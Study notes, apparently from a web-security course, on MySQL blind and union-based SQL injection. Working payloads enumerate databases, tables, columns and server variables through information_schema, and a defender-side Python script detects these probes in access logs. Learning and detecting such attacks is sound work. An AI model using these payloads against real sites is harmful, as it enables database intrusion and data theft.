Day 4:
// Guess the length and the name of the current database
and length((database()))=5 // length of the current database name (database name: sqlin)
and ascii(substring((database()),1,1))=115 // first character of the current database name, ascii('s')=115
and ascii(substring((database()),2,1))=113 // second character, ascii('q')=113
// Determine how many databases there are
and (select count(schema_name) from information_schema.schemata)=6
// Determine the length of every database name
and length((select distinct schema_name from information_schema.schemata limit 0,1))=18 // equivalent to the next line
and length((select distinct schema_name from `information_schema`.schemata limit 0,1))=18 // first database
and length((select distinct schema_name from `information_schema`.schemata limit 1,1))=5 // second database
and length((select distinct schema_name from `information_schema`.schemata limit 2,1))=17 // third database
and length((select distinct schema_name from `information_schema`.schemata limit 3,1))=5 // fourth database
and length((select distinct schema_name from `information_schema`.schemata limit 4,1))=9 // fifth database
and length((select distinct schema_name from `information_schema`.schemata limit 5,1))=4 // sixth database
and length((select distinct schema_name from `information_schema`.schemata limit 6,1))>0 // there is no seventh database
// Guess every database name
and ascii(substring((select distinct schema_name from `information_schema`.schemata limit 0,1),1,1))<79 // ascii value of the first character of the first database name
and ascii(substring((select distinct schema_name from `information_schema`.schemata limit 1,1),1,1))<79 // same check for the second database
and length((select table_name from information_schema.tables where table_schema=0x73716c696e limit 0,1))=4 // length of the first table name in the first database (0x73716c696e is 'sqlin' hex-encoded)
and ascii(substring((select column_name from information_schema.columns where table_schema=0x73716c696e and table_name=0x6e657773 limit 0,1),1,1))=105 // first character of the first column name in table news (0x6e657773): ascii('i')=105
and ascii(substring((select column_name from information_schema.columns where table_schema=0x73716c696e and table_name=0x6e657773 limit 0,1),2,1))=100 // second character: ascii('d')=100
Note:
and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
and ascii(substring ((0x41),1,1))=0x41 // statement seen in a packet capture; the space after substring makes this injection invalid, probably a tool bug
union select variable_name,2,3 from information_schema.global_variables
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x76657273696f6e // version; can also be obtained directly with version()
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x62617365646972 // basedir: database path
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x44415441444952 // datadir: path where the database files are stored
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x686f73746e616d65 // hostname: server host name
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x504f5254 // port: database port
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x5049445f46494c45 // pid_file: path of the process pid file
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x47454e4552414c5f4c4f475f46494c45 // general_log_file: log file path
union select variable_value,2,3 from information_schema.global_variables where variable_name=0x4348415241435445525f5345545f534552564552 // character_set_server: character encoding
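Read from the defender's side, the probes above have two tells an analyst can key on: object names passed as hex literals (0x73716c696e is 'sqlin', 0x6e657773 is 'news') and a small set of repeated function shapes (length((database())), ascii(substring(...)), information_schema lookups, union select). The Python below is an added example and not part of the original notes: it decodes the 0x literals found in a request and flags access-log lines carrying these probe families. The log lines, the client IP 10.0.0.5 and the /news.php path are constructed for this example.

```python
"""Defender-side helper for the information_schema probes listed above.

Added example; it is not part of the original study notes. It decodes the
MySQL hex literals the payloads use (0x73716c696e -> 'sqlin') and flags
request lines that carry blind-injection probe signatures. The access-log
lines in SAMPLE_LOG are constructed for this example.
"""
import re
from urllib.parse import unquote_plus

# MySQL 0x... literal; an odd digit count gets a leading 0, as MySQL treats it.
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)")

# Signatures taken from the probe families on this page.
PROBE_PATTERNS = {
    "db_length": re.compile(r"length\s*\(\s*\(?\s*database\s*\(\s*\)", re.I),
    "char_by_char": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),  # tolerates 'substring ('
    "schema_enum": re.compile(
        r"information_schema\s*\.\s*(schemata|tables|columns|global_variables)", re.I),
    "union_probe": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}

# Combined-log shape: client IP first, request line in quotes.
LOG_LINE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+)')

# Constructed sample lines (not a real capture); payloads mirror the notes above.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2014:10:01:02 +0800] "GET /news.php?id=1 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Mar/2014:10:01:09 +0800] "GET /news.php?id=1+and+length((database()))=5 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Mar/2014:10:01:11 +0800] "GET /news.php?id=1+and+ascii(substring((select+column_name+from+information_schema.columns+where+table_schema=0x73716c696e+and+table_name=0x6e657773+limit+0,1),1,1))=105 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Mar/2014:10:01:15 +0800] "GET /news.php?id=-1+union+select+variable_value,2,3+from+information_schema.global_variables+where+variable_name=0x686f73746e616d65 HTTP/1.1" 200 4980',
]


def decode_hex_literals(payload: str) -> list[tuple[str, str]]:
    """Return (literal, decoded_text) pairs for every printable hex literal."""
    found = []
    for m in HEX_LITERAL.finditer(payload):
        digits = m.group(1)
        if len(digits) % 2:
            digits = "0" + digits
        text = bytes.fromhex(digits).decode("latin-1")  # every byte value decodes
        if text.isprintable():
            found.append((m.group(0), text))
    return found


def classify(payload: str) -> list[str]:
    """Names of the probe families present in one decoded request target."""
    return sorted(name for name, rx in PROBE_PATTERNS.items() if rx.search(payload))


def scan_log(lines):
    """Flag log lines whose request target carries probe signatures."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        target = unquote_plus(m.group("target"))  # '+' and %xx back to characters
        tags = classify(target)
        if tags:
            findings.append({
                "ip": m.group("ip"),
                "tags": tags,
                "hex": decode_hex_literals(target),
                "target": target,
            })
    return findings


def probes_per_ip(findings):
    """Blind injection is chatty: many flagged requests from one client stand out."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["tags"], h["hex"])
    print(probes_per_ip(hits))
```

The char_by_char pattern deliberately allows whitespace between substring and its parenthesis, so the malformed captured statement noted above is still flagged even though MySQL would reject it. The per-IP count matters because a boolean-blind extraction needs one request per bit or character, so a single client generating dozens of flagged requests against the same page is the signal to act on.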
mysql> show variables; // or list all global variables from the interactive client
A low-privilege user can also read this:
mysql> show databases;
+--------------------+
| database |
+--------------------+
| information_schema |
| test |
+--------------------+
2 rows in set (0.00 sec)
mysql> use information_schema;
database changed
mysql> select variable_value from global_variables where variable_name=0x686f73746e616d65;
+----------------+
| variable_value |
+----------------+
| win7-pc |
+----------------+
1 row in set (0.00 sec)